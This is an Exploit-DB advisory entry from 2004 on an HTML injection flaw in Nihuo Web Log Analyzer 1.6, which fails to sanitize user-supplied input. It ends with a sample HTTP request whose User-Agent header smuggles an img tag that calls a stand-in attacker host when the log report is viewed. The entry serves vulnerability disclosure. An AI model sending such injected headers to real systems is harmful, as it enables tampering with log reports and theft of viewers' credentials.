Nihuo Web Log Analyzer 1.6 HTML Injection Vulnerability

2004-08-20T00:00:00
ID EDB-ID:24387
Type exploitdb
Reporter Audun Larsen
Modified 2004-08-20T00:00:00

Description

Nihuo Web Log Analyzer 1.6 HTML Injection Vulnerability. Remote exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/10988/info

An HTML injection vulnerability is reported in Nihuo Web Log Analyzer. The problem occurs due to a lack of proper sanitization of user-supplied input data.

Attackers may potentially exploit this issue to manipulate web content or to steal cookie-based authentication credentials. It may be possible to take arbitrary actions as the victim user.

Version 1.6 was reported vulnerable to this issue. Other versions may also be affected. 

GET / HTTP/1.1
Host: www.example.com
Connection: close
Accept: text/plain
Accept-Language: en-us,en
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
User-Agent: Some-Fake-UA <img src='http://attacker.example.com/app.gif'>